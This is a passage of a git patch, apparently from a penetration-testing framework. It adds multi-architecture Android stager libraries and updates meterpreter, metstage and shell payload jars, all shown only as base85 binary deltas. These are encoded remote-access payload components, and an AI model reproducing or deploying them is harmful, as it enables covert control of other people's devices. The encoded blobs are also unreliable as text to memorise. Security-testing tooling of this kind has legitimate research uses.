z=m4Fd3#=2hc>rX=M$iZP!9&8oBgzGa{d5tBtRm48~(M`w{j}*_yy+=wW*t8}tM6tpwss#`}yko@j^e zXFKU4B@G9C{A>sMB#j<(54SVjx4PI9>i<2ld+ig7Z)tys$CUdwcA!l~rTb!W9>-C{ zVX_JuyA2h39D1K-pe;$`=-Y}_?prC$q;Iw0+6Q_K1$S(glScWNLWf`JF&;+W7+s>I z?pp@)VMP8Bi^b}fndpC`lQL#+LZ``uVP<-I6K13h^d{s;+jBA@am~+W=rwrHJl+3c z7iAKYDKmeOSwGo|>y}9i*L)^<#s=E2jmfSx{X0cp9qV1ju9w8#i1sM^N9(_Xq(Rb#UEd8yNE#z)f}{e;g)zY7G<6qj zzf=j_Qmz>Iq2q_SF(wzoJoVL^%Jz~M*ri-Gv}b>v+@upam2!n$^VEC)K1bL!Pd$Z_ z?VWW`=WO2(LOXN=KX-Jl5-e2n^kBWMx>OCF`P_bIam=%;)dIXQ&)tPn_E|gU2D$xq zXixa%T6iR^IQD#=QmakluE&RIzCTn8oBDRHw%u!Qi|n55&*nyhz;kRrPw6Hj4<=9T zYfXQ{10#9rT5GLG-ObJmnO_du@oy^=DU;ZnBNmT#tL+(9~3M zW<2;{rK*ONS}_dJ!D=eZAnQveFGHlqjvhOFfTSssrwXJ_74Rczn&ji7lsW$2wA+r~ zC*pgI^^i5YTz32tC5nxCAhqZPRfo0}gZY2Kc_*~1WiN0;rmjY~FIqQEL6csLmLA25 zLB(OW6{q0%)KWyvLgyK0fz_9^lH;L2=_P0JupQ2k<}A9^uu8ER)*NS7ZdYf#T6K<; znV?Lqvrf40WHs<=Vbqv{p{aDyePcdJc6~C~lIERAN9=B^QEZY^ECySuUY%~KIl*VhGw?sNqC;X6Fst)Ui!N%s`PlbmHau4U+D#gPf znqX4T+FlLGa&c&e)P;(RjOG%h3IG65O92rA6aW+e t2nYxOg=%L+UNppzlSl_X4uxuGM5-S$W8nn=0PqTvlm{;crUn22006oKAK(B0 delta 1790 zcmV@6aWYa2mn-Kyh4!W4zkP4t%)EJT-t6vFoON^0z7fjb4b1GWo45Y?W6QTQpL~D%{PiCmT{(a2 z_wv;?q8bsc&+X5W`2A`Uoub(O0QguU%0LdtMEIxMxb#8Z75CQ^qN@fJmFR#@Gzuoc zF>nIRg45tR@FF-57Qjp3J@5ti5&Q+Z;b#XJ2lK!OuYz~LC*W)F6SxD~5=4)IXTTY7 z9#p^*xBvoB2OHoe@D_jg5PS~42S0;fz;EDB@Hg|9BpLxlFbSr>JXisj!E4|OcoV!0 z-UlCn&%l@9I`|I!0&asl;2&UOO>>|J>;SvLKJW}U0ZxN?GhR2a)`qW_@Kd-bNi9r`w*?-Blc zTH-v;<4e(2V(X~W2$wQF!KFe^^PE#WPX!|;xooE?o_{QLthB_XMn#@a2OSZ49p&>R zXg^<*6b*CPK_`FtyeiG|HEE**d=27xEc{LLeB=8JM(pC!6f!|2z6J&z;x&!?tDwD?S65n%+us_B2 zj`j$7RtDLpq(L=122|| z)iLFvZQbya#Qx42-X57|jg;c$+p%Vzl|qbzsNSFv$6)aJmf*!nu(@;e8uJL-G48pG zd4^+I zm+zoD{AG_1z1~OJWzo; zKD#FD5;dP$iQ@N$C2HIyY?hFHE#sN&6=My=A>)5-p^ANK;Td4<-J}k$*a7LIuIEN$ zBu$VsMe-EtTq3zN0ZOElO0bpYsjp;vmB4o^g|hEOju#asm|TyFG}vgW*&9{gt`x$^ zUUCXEPUHl&fL)6;@c(_zvTKq0OBK6%$-PjpJ8yWGRP8V<<;uZ*(h-A)gq-gn~u6wK27WW$$He%w|leg zUVARKS8Z>pFz)+R$M%YpX)*F(iqv_(X>`|Ek$Ud8HlproX*jZ8c4{o=B4u05Cl^+n za&)f^QMumIX3{OT@w!{(p0~C%1K3IRL!YHVhBR|;mSC8Ck;S8$cBTK8LSi`KD zOkSE;SD$_H)De>ANS-T^Hdn%rq*omZ5} zPDxVagYxvcLXSxYpT=uztNPU8$H$HIw4xR>Zz%diW?GT=$-5P4Z_gNp>^FZ$$E19R zLc@luYKPjprM(%FHECu*>P_>n;4ADSFH6cRFRQO7B>CNhCVh~k<{6{)9oIO&viD-+ z469J{9II0EEUQuTJgZalOsiPJCwt%KIzUP$?_slJ0dXe(W3vYUwdWVv delta 86 zcmdnXx0jDEz?+#xgn@&DgCQhokJCiHbk*6Pi#`@HG6ZRF2yob$>1;m;BkIfzc&@~un From 66ff5998a5454f9a29926a4d6342d41c63120ca0 Mon Sep 17 00:00:00 2001 From: joe Date: Mon, 10 Mar 2014 18:50:27 -0700 Subject: [PATCH 049/853] New multi-arch stagers. --- data/android/apk/AndroidManifest.xml | Bin 3536 -> 3540 bytes data/android/apk/classes.dex | Bin 10700 -> 10040 bytes data/android/apk/resources.arsc | Bin 1088 -> 580 bytes .../libs/armeabi-v7a/libdalvikstager.so | Bin 0 -> 13436 bytes data/android/libs/armeabi/libdalvikstager.so | Bin 0 -> 13432 bytes data/android/libs/mips/libdalvikstager.so | Bin 0 -> 5328 bytes data/android/libs/x86/libdalvikstager.so | Bin 0 -> 5220 bytes data/android/meterpreter.jar | Bin 37700 -> 38353 bytes data/android/metstage.jar | Bin 1851 -> 1851 bytes data/android/shell.jar | Bin 1853 -> 1853 bytes 10 files changed, 0 insertions(+), 0 deletions(-) create mode 100644 data/android/libs/armeabi-v7a/libdalvikstager.so create mode 100644 data/android/libs/armeabi/libdalvikstager.so create mode 100644 data/android/libs/mips/libdalvikstager.so create mode 100644 data/android/libs/x86/libdalvikstager.so diff --git a/data/android/apk/AndroidManifest.xml b/data/android/apk/AndroidManifest.xml index 6ee7f3e36fed7e9e467fff4db6fd95f5a44848f9..57e86cd85b8f352caeb6fec49f73ddec852c075a 100644 GIT binary patch delta 285 zcmZ9{KS~2Z6vy%J+uhk+$gGIkB(W0$!9uXGu+9Zi2!a+G2&9Nj2o@o*2Z&9WTci+i z19ldkKp{u4unbngMt?RI4t$t-kN1apZLXR{OwOtRW1ok4aaaz4iQLJ%e8`t<8JtQ- z&SfG?Nh7$Fd)dfw3?o^}r<^1(l^5B_j)RtTq$eX;$g|YAoj+aF9Ye0^(bo-*F$2AC z=vQrH^}8X@{DHRoRh$u9 Mrubi1Rr;>|0DUhsL;wH) delta 320 zcmaLSFHb^I7{~G7bN|S7p1ZNhrrWu01{*;F!77lc^U-&dsqD3m1GL466wSOW^|)*$u3$ RO|u`JyM6!9_2SiC*cx>WG`0W$ diff --git a/data/android/apk/classes.dex b/data/android/apk/classes.dex index 3a45c8b3fbe7179ddfdaa76d4df59f50dc4e90ac..ff39e87f11448e4c3543e9611c6a19b1d18aa857 100644 GIT binary patch literal 10040 zcmai)3wRvWb;r-0nSE$?wO*}kOIjprt%of?q?P5TEXgnVB}=kpX)TOxFss$bT6;CS z+MSgp^1ulcNPvd4;5aSe0~$Uk5HJn!5eTUX2~Y~*9sE&R+|+3r$_F$}C`t1*{hvFt z@>&=e`?u%Zd(VB$x#!+Hn%!Z2($l#^a0R#p+zU>DH^A?~ zyfV}UL*T360q`PtAGphjmV(`29NY{}f|tR60#^l58CVW>fFY0r*MskZC&0_#H^3Pp zsszoT8yo~#@D1=ia0qzP;S!{9pbU2qEg0#GGU4Oj^}!KFY4hd~CM0N()* zfk(j)z?0x9@Kf+ScnQ1#-UerYvkLbLB49aK117eh96SeJ182amKuI-G2-Jc_papCMd%&e&1Y|%Cd} z2Yv?L1ZTjn!3W@vz%id_7N`bwpc$+M8$d7E2QCNWU;QSb!#5qK5+ z9J~d74Soau50uv6o;Cb*8I1SE#cY#ui zwFyc9mZ@B~vmmh?2q8}hWkQIO9fpKZAWR>@)f5I88lf3Nb*cmP0NVmB1Px#jSPYhc zrJxZsfe2^@yk9H_E5J&y3akceKr2`a+CV$#0PDbdumNlYn?NVn47Px+U>n#Dy1)+5 z4F*9B=wJjK0;3=S4ud1W4fuLtw&e$5C8-#abgG(6Qyoi*@!NU#zp=_+p)X z#~15Zdh$Yb>C1dO>{GtjhW*JGZ;7nGZTH3g<*O91&f{Sl*3UvOfn@)`2Oa;V&h4`e z&&6+{bNf6Ge6dXn$d6$KXX0XC@f`4VF<_nh+H327gno&wYiK;L`wH~g&@Z)ZDhu)( z3iRdzeNBPRpaf5oqs#**|!{{e7Rv=1nGh2{}s}QS#sEt4^U3ewdHOp1x4-j z9w{~Yij)!hG2|>nU>cI+>N%jIHpiZd)%kaj8vgyIluo(@(ut_!awk^Y813Vloj+kWU<|EF?NqhnO;m&Qa00HNLfekNExAjgY?_>vuqi#F z9^YKt;oXpB*u6MihI#psl!E>qvK%`a=T}hJmP_esnO;iQ*z)UA7SlH&Ls-3RA41Dt zw&kBo*+6F@tI*#~QhMlSDTDNFDZO+OvKsZCfDFTLk3!bi+Pw+!@!eM>LL0Sz=4eegPus1>`TZ?HA(CUqZS8Gx#@CzYHV% zM=2N3&mdc{8+}X4IrP_3E}=Ui-Jk^20KS}-pu2ga!^LY%0FFhzdMrWTx63_9^Sb2v zymosbS3o{xmwWBAYM1+v=Jxabb9ofyXHb4KC@v`f3G#O$Z9+CIfP#z9 zi^B2mLiz@jZ?(($teshYE6V#&eh1p;vCk~OALR$^`U=W-!fp>>{W4qUG3$1o0hue% zuY}I!Uz1Wuy}Z^s%hG|hDDflD%CDNvM>g^m`49d;KKnKm7944Ti=Z0;o(;=}+g}PB zC**#Cy~}Rbg?3fYf-*kyf+9LBDCh{P)oL3V%{wTn`czjluSS^yIqzl_I>mr-@*N%J-83`EFW+igDB%TtHD!AIxq+= zfw(&7gZY=8dkV6~TR|ZNSUS7}YrzOau-p2IYP|Ir#U|)Rcnj8o&#U`b-wYd{H{|<)%xB#Q zY~>ox&#Up+%o>^zScHARqt>>xqO1Y;U4tDb9d4sA#_@?VM}-`tjs!jPP>oDn_6MJAx5dhR+%?mnywJq*n4cz3Kh+6#KRjUI733+(uwEyzcWD zfktizzF!G+EUlx`-!3(yc@;h8 z^Le>e8*25=;u^gHd^Yx$;Ikv>uYEsnyMylYaSS-*TnajkIpHN0Qu-;_X@u8fNAe-! zHe#lI%6Om^(nI6e?-BP(s}iKsg8tNj^@o@xUDRyBH53 zEYWJIYcDO&eDtRpmlby|3b}=h7^~I>?#IosXr;GuD^%lHg1OJv;L>f}2P8^eA$M}R zg;F=~53+R0m@OxbsMbLkx3rc8rKHge-!iLb5=W-q3lZ3USYTT4%Pm{TB`Ic zrCv{wmuLLiBA=`Fxi;!`x{=;NZ=#Q#^bG3pn%PAYXssK&P>os!trwaPy)L9I4Y}M@ z`&c`TZz!eLt~CNZDDxNey@(ocu=2jZ>wOfy<-a>Z&Vv-(#y*|E2-&A-Q3*LO|75OO zqbVrkney&RHXP6uZ%)&&i{R!H?z0>9=zhV_%1om33 zTC?`r-I@=&MhVokYR`tJoQQL7+oz?&8X~Yp^B`8eIH8TO18Kjsi8Y~wwac^%{A6QTy|J00MY(+KeS$MLHI-mBk&O%?Qz7^dJR_VawiD*G8x z2-yMY5v{_7F_ytDSTakDJl-i@_< z25FVkXgMN#7!PlgPfq-tZJiNl2l^jSUxO?>$2k2bbrHEPug0@YjVOj? zC2EG$KKNuG?$4(L)!^*f&Fe8Ay+U);I2vKI2a#@UI6y5?Be0)Gg4KQr{xUYgdod0_ z>al0wGi(|>4$D_o-lBp$_8ni%$m4MZ@f_cQCkM^0zY_WEhaf!8cf{7~Y}@=jQEXI$y^9^2KN6%dp|uVwu0JkrRcH!TF~P%Gl=YjP!>y(p(?gx4geq z@Exb~V0vVJ4c;Q~IO_0^%lNX=Yh{{s&S&4Tbl8&rrsupe?B*KYLU0+!21|bCVab2f zTWtwx%YD@0>4wW1Y#WXdPB+_fg)MnqbAGEW`8@}>)qxgxme*m|X|(g|@TNpGk%-W` z=4CC*SFBvMdQI!bO`V&!Y~8lKYe#oa@6KI)yZZ;Cdj>Dwd&$1oP<&V)IW(F$d?Yz$ zq|)P=teKlQIyrR(x!dE(gpn}Uk+a>B%EnC;*py2ohdWcoNa9e_;n+lsL?FFd#&-PsdQK%^B=^?cTAC8{BUHws- z+Y>W}GpWRIB$iG`Hpb1wM8ceEql)SLc*-z!!;D}Arao!5QR#G1DjV69Glr9T8_h1v z+>SPrdS-@cPb!t>%$lBfYAiCQo3U&+w{f~#-1ONNEp0UKGcDR^@n@DtGr6qU8#6F|+*s9xZTstDritR}PbGcM^QH2e0C~p>SK}3`lM{Q2lK%ms_5YWjwDi%%`r39 zWu$ZFfSJ)_W87?E(XO0XQ0AX5+nV5DJ7>%3^KIu$+n(3_-0AG|%}cEOWXw1ev3)Rm zW>)*+b!}8OGdF)vc89WsEt7FQ&9lRyFYiZYcVXqo2no-~%w%$DQy(s<7A&yXHFQ{y zW5E>;s6S^Iu_1Osp(UIsBgpoz?9|GWtBPHJp1GWz^Ybu;dJGX_`&KrQ(MOUPK_nkN zmDb=4-HdEE&GerB9&8E*EaV;AuH@2zRQ!mJk=ql;Suo}Zmrk+Mg_Z55vwA$2!3Go= zU`6l8Mv_8s)LHeWOXGURjO<<6+}a5xF_MVK%yS;enTcd1U(@pVWQ4oSW|NWasjO+l z#`HlwgL>9>#A7P3z@24h+?wT-b2bA5eCO77c!9D3J)4y-nb|w)S+3a{i<_wo_F3z` z&$WF1jxw`8-}3nuC52m}bv*d&4bV!J+o{58R*AFUk}5_;&S-zv#-0JHi{c7@&P6Jp zH$i+H?A*SkvwL7q@4>E}UC|v}fP-g{ltCOdgF66@n?amA_~;=GA2@mV69?1aKC0V` zYgxFCR2zwd8hqvnT;j|}Me)o)MR7i(c(W$2 zRISYu-QWn*sR0iJP3Im6n&bmP(***TTybl|kqWOr(&DL%&dH44qZ?El$2Ml_JN2Wo zw;*hx5*j#NI;4k8C-Q zwpYAJ^XRji6B$`paFP)hb{X)H5!b003Elv#M=L7gq&(^6cnVKC3ZU$~y@y<*)?*sE zN9|3K9HYGXkvf`-lSq(~Kz#6%C^-|xMCyo6Y7#zn;^Pqf=16iyDoWyXx8hK$1N=CL z!gMNw=}G1?Nz%qJNOFy34`p#OK$)`aT}CvMh$Z1`8K7Q6KRSJHE(6nxlat&jqf<^Q z`SAd0z-#uALux9Aw-f1D1~Xu?gWb@xI#<%tJhR@k^(@$gsXmuD9Lu1bhdwKfa}$ps zvG|c_CI*M9X%n%Vk;jg;$f=0WMSjMfA{VRNx;LXE>a+UxXta+!b|Tu@M`{M^OU>jA z5?KmnV-uKsd$Q0Af=$~WW?zP% zq|GS`AknXn=X5-UTJz3zW}Y(S$R>3?4Png;1ZKt~#m4NE5l1_m)obBW%aEoY&eja zreTEn+=*DS?gER|f&3iSB;1`CnIgwgJRM+~$mPe&5PW#VGs5L>Z*Qk1g40d-s8&VR zakg>2GFdfGRlY95yBrGjacLAE-87%oGX9tnKSk|%s(4E%La20yP!fAP=q{n%DIO7D z6_29yVYTQnQ7c&mZ;iwqP|;IuNF$9s$3=3wjWUGOZDB29s5+r4I-3)bloH_ zYHwfnh$_BZ)~&f85c8IItDaXxZTq#Nr4;YpO_%>el^#U5ZU?CXO4F1>IH}S>PSMDk z5Uf_SN*Qq%MzT*8&x!^1I2*;B;to27o8B>BRlcCyt!nr2utc=Jd#5PF3lwj?SP)Ph z|00%Nn^2wah{d8}cKg2eZ>j2?qI|MlIa=jV9ZunNI_X9B-NUMKx2S(uRqqw`$5rin zV##q;!1TE4ctliP?+`H89FEXDmEcqSCG7I|BsBcKWI61v5sRMgKCY_Y5iX_T8n%_5 z#}qger#S2o^PEbrgY1d85#RQ^{Gw#m`fAx&g@bzM;Xb#)=Pv(|*V^&R15D2@@y~qQ zjVj$PT5$JI3V%XXo)gReYqA4v3ADCOIXVH$PD`xeTHBP{#Pg_!_gVNT<_`}(){znv zzYw8vrBoTy+z*O*R=Pr&gX~ICUagcsDG$ig3f)(?;X(&kDGu0_WuA*Bwqjk literal 10700 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 kRp_kbYk`cviKRA literal 1088 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 